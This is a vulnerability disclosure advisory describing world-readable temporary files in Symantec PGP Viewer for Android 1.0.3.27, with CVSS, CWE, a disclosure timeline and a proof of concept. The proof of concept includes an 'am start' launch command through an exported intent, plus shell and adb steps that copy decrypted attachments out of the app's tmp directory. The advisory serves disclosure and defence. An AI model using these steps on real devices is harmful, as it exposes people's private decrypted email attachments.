[Unassigned] SymantecPGPViewer for Android: Weak File Permissions

Description

Symantec PGP Viewer for Android (1.0.3.27) was found to temporarily store attachments decrypted from a PGP archived email with world-readable file permissions. The attachments are stored as soon as the user opens a PGP Archived Email is opened but deleted when the application is closed. It was also observed that upon application crash or non graceful exit of the application, the decrypted attachment files in the files/tmp directory are not deleted.

CVSS 3.0 Base Score

5.0 (AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N)

CWE

CWE-379: Creation of Temporary File in Directory with Insecure Permissions

Researcher

Tanoy Bose - xen1thlabs

POC

Any attachment that has been decrypted by Symantec PGP viewer is stored in the [/data/user/0/]com.symantec.pgpviewer/files/tmp/ in unencrypted and world readable state. This allows an attacker or malicious application with minimal access to the device would be able to read from the decrypted attachments.
Even though the […]/tmp/ directory was emptied after every message read, we noticed that upon an unsuccessful exit of the application (like a crash or forced stop) the decrypted data persisted (with world readable permissions) in the […]/tmp/ folder.
The application can also be launched from a different application with the help of the exported android.intent.action.Viewer action in AppSplashActivity activity.
The vulnerability was tested and found on Symantec PGP Viewer android application version 1.0.3.27 on Android 8.1

For our test, we use an encrypted email called Message.pgp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
-----BEGIN PGP MESSAGE-----
Version: 10.4.1 (Build 777)
Content: PGP-EML

qANQR1DBwEwDNaK2fW1tsMsBB/wIULsNkoXNOTxf9i65kWezgS69rbBfUok/svLT
opQ2B3LLyt9y7yTnF3wavV/XXPkUGJloyCRnNOvSpFXAYH9OWG4J7LV97fyFb5gW
QpL8eD0GWwyp0Nfrse/xo4hCigbj5Ei4beZMEHPHrJFXmvx3A51ssIr78210gaGf
MiAcL79Mv9iNU2L04UoPwOLx2osOjMivkRnkhNYzx+ZuifiljXU9jd8cZElMR490

[...]
W96KSxOjPBPd3LDT43IgyvhWp52fu9XsCYS97TBQi8e3AfQsWh4FTvLlTZtWZEoN
5j5bNBDEuINwXGFnpOIdp7eifa7Efxn+4wIHrEggjozUFqqsDRPHJwumb3A1QmJ0
wmeV7Y8DILAX7RRl5lkYoyIm2zlpOVj+XKKRjLPP3pr8wzxgNn8GI5B1NdOYCl/7
K5Is4VuZnMltIvr4tLtL6Fsu9vGvbjKwqEWp1e0jWw1r8f0=
=kvm0
-----END PGP MESSAGE-----

We can lauch the application using activity manager or any many malicious application using the following

1
$ am start -n com.symantec.pgpviewersymantec/.AppSplashActivity -d file:///data/local/tmp/Message.pgp -a android.intent.action.Viewer

The following evidence is provided to illustrate weak file permissions and the existence of decrypted files.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bullhead:/data/user/0/com.symantec.pgpviewersymantec/files/tmp $ pwd
/data/user/0/com.symantec.pgpviewersymantec/files/tmp
bullhead:/data/user/0/com.symantec.pgpviewersymantec/files/tmp $ ls -alh
total 958K
drwxrwxr-x 2 u0_a112 u0_a112 4.0K 2019-08-05 07:17 .
drwxrwx--x 4 u0_a112 u0_a112 4.0K 2019-08-05 07:17 ..
-rw-r--r-- 1 u0_a112 u0_a112 4.2K 2019-08-05 07:17 image013.png
-rw-r--r-- 1 u0_a112 u0_a112 823 2019-08-05 07:17 image014.jpg
-rw-r--r-- 1 u0_a112 u0_a112 801 2019-08-05 07:17 image015.jpg
-rw-r--r-- 1 u0_a112 u0_a112 4.5K 2019-08-05 07:17 image016.png
-rw-r--r-- 1 u0_a112 u0_a112 1.6K 2019-08-05 07:17 image017.jpg
-rw-r--r-- 1 u0_a112 u0_a112 7.9K 2019-08-05 07:17 image018.png
-rw------- 1 u0_a112 u0_a112 772K 2019-08-05 07:17 pgp39246.pgp
-rw------- 1 u0_a112 u0_a112 564K 2019-08-05 07:17 pgpVieweravYo1b
-rw-r--r-- 1 u0_a112 u0_a112 28K 2019-08-05 07:17 xen1thLabs_advisory_-_SymantecPGPViewer-WorldReadableFiles.docx
-rw-r--r-- 1 u0_a112 u0_a112 500K 2019-08-05 07:17 xen1thLabs_advisory_-_SymantecPGPViewer-WorldReadableFiles.pdf

Extraction of the decrypted files (docx file):

1
2
3
4
5
6
7
bullhead:/data/user/0/com.symantec.pgpviewersymantec/files/tmp $ cp /data/user/0/com.symantec.pgpviewersymantec/files/tmp/xen1thLabs_advisory_-_SymantecPGPViewer-WorldReadableFiles.docx /data/local/tmp/test.docx

~/symantecTesting $ adb pull /data/local/tmp/test.docx .
/data/local/tmp/test.docx: 1 file pulled. 3.0 MB/s (29167 bytes in 0.009s)

~/symantecTesting $ file test.docx
test.docx: Microsoft Word 2007+

Extraction of the decrypted files (pdf file):

1
2
3
4
5
6
7
bullhead:/data/user/0/com.symantec.pgpviewersymantec/files/tmp $ cp /data/user/0/com.symantec.pgpviewersymantec/files/tmp/xen1thLabs_advisory_-_SymantecPGPViewer-WorldReadableFiles.pdf /data/local/tmp/test.pdf

~/symantecTesting $ adb pull /data/local/tmp/test.pdf .
/data/local/tmp/test.pdf: 1 file pulled. 9.8 MB/s (511956 bytes in 0.050s)

~/symantecTesting $ file test.pdf
test.pdf: PDF document, version 1.5

Disclosure Timelines

  • 22 Aug, 2019 - Reported to Symantec; Won’t Fix
  • 23 Jul, 2019 - Reported to Mitre; No response
Namaste.
You can know about me at my portfolio.
I follow my own Vulnerability Disclosure Policy.
Most of my work is listed here.